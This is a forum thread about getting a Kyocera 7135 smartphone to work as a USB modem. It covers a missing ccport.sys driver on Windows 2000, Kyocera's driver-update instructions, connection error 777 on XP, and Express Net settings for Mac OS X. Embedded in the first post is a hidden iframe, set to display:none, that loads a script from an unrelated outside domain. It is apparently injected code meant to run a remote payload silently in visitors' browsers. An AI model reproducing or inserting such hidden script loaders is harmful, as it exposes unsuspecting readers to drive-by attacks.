Modem success?

Anyone had success using the 7135 as a modem? During installation, I get a message from WIN2K that it can't find ccport.sys and the modem doesn't install correctly?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

ccport.sys file is needed when your OS is Windows 98 (for more information on drivers and how they behave visit www.driverguide.com lots of informartion and fun.....) and you mentioned that you have windows 2000, some inf file got messed up some where.....,

I am guessing that, you getting this error because you are connecting the modem to your computer via USB...., anyway safest bet or way out is start your device manger on your machine and see whether you see any bad usb connection, if yes uninsatll it and start all over again..., make sure you eixt and connect again this way your computer will detect a new harware and reinstall the modem software (again you can select which driver you want to be installed)....., if this doesn't help let me know i might be cryptic feeling sleepy might do a better job in my next attempt.

hope this helps......

This is a known problem, not with the 7135 but with some usb modem devices with win2k. As the files needed aren't on the Win2k disk.

Interactions between the virtual communications device (Vcomm.vxd) and the Windows Driver Model (WDM) modem port driver (Ccport.sys) or lack there of can cause the system to abandon successive timer events. The computer may hang when it attempts to handle these events.

Here these files should fix the problem.
Try re-installing and use these files when needed. You may only need the CCPORT.sys file

modem

My modem works fine.

I use usb connection from cradle.

take phone out of cradle
put cd in drive and disable it, dont let it run
Turn off hot sync app
Put phone in data mode using the fax/modem app
set it to data next call
put phone in cradle
and windows should find a new usb device
and follow the prompts from there.

once you get it installed go to the control panel and modems and choose the modem and do a test on it.

hope this helps.

Starting with 2000, Windows enables System File Protection. This means you can't replace one of the system files, and if you do the older file is recovered at the next boot ... unless it is a "signed" driver and has been properly updated and installed. This also means that anytime you attempt to install an unsigned driver that the system will pop up female dog (b-i-t-c-h) boxes warning you about unsigned drivers. This does not mean that the driver will not work or run in 2000 or XP, just that it has not been tested and approved by Windows quality labs.

How do I know this? I develope Windows device drivers. Given that you have a binary and install package from a reputable organization ... install it ... it should work.

Greg,

What kind of binaries are being installed? A USB filter to use the 6035/7135 USB cradle as a modem? I've beenn looking for the same thing for my Toshiba 2032.

i am trying to use my 7135 as a modem with my gateway laptop... I have XP and am connecting using the True USB cable from KYO... The computer acknowledges the devise as a modem when I tap on the FAX/Modem Icon... When I dail out it shows that is attempting to connect on both the phone and the laptop, but after 5 seconds the computer says "cannot connect" bad modem... device manager shows it, all software is installed correctly... What am I missing??? Are the settings on the 7135 different when using fax/modem???

yes, I have tried with disabling the hotsync manager, same problem... here it is exactly as it happens "Error 777: The connection attempt failed because the modem (or other connecting device) on the remote computer is out of order.)

I know that the computer is recognizing the modem, because when I tap on the fax/modem icon on the 7135, XP gives you that doorbell sound letting you know that it is connected... anyone else have an idea???

Has anyone tried using the 7135 as a modem for a Mac yet? I'd imagine that OS X would simplify the process immensly. I'll certainly try it once I get my 7135.

I finally got my phone working as a modem and fax working with thehelp from kyocera. I can also use the included browser on the phone too. The tech e-mailed me the directions on how to make it work with win 2000. I dont know about any other operating systems but this procedure worked on my toshiba lap top satellite pro 4600 runningwin 2000. I hope this may help with any problems in a small way. Good luck. You must also have the included disk for the 7135 to get the driver you need. I have used my phone in the cradle and with the usb connection cabls.

Thank you for contacting Kyocera Wireless. I understand that during installatio
n of the modem your Windows 2000 computer requests the file ccport.sys.

This issue is caused by Windows 2000 attempting to use the Windows 9x
driver. Please follow these steps to install the Windows 2000 driver.

1) Cancel the wizard

2) Right click on My Computer and select Properties

3) Click on the Hardware tab

4) Click on the Device Manager button

5) Locate the modem. It may be listed under modem or may be listed as
an Unknown Device or Other device. It will have either a red x or a yellow
exclamation mark on it.

6) Double click on the modem

7) Click on the Driver tab

Click on the Update Driver button

9) Walk through the wizard ensuring that the CDROM drive is checked

10) When the wizard reports that it found a suitable driver, check the
checkmark to display all the drivers that it found

11) Two different drivers will be listed from the CDROM. Click on the
one that has W2K or 2000 in the path name and click OK or Continue

12) Complete the Wizard

13) You computer will now be using the Windows 2000 driver for the modem

If your issue is still unresolved, do not hesitate to contact us again.

I got it to work in mac os x. Just put the attached file in /Library/Modem Scripts and entered ppp info and I was cruising at 100 kbps using express network. Thanks to this site and a few google searches my phone is doing everything I hoped and expected.

express net with mac os x

put phone on cradle and open fax/modem in palm

goto network settings in system preferences and select kyocera wireless usb modem next to "show"

click on ppp

service provider: Express Net
account name: yourcellnumber@vzw3g.com
password: vzw
telephone number: #777

click on modem

select modem vzw_1x_on_115200
uncheck wait for dial tone

open internet connect in applications folder

click connect and you should be connected.

this is for express net only...not for a regular 14.4 connection using your minutes.

a good site for using mac os x with cell phones as usb modems is at:

http://homepage.mac.com/jrc/contrib/mobile_office/

with all the help i've gotten lurking around here it's nice to be able to help someone else.
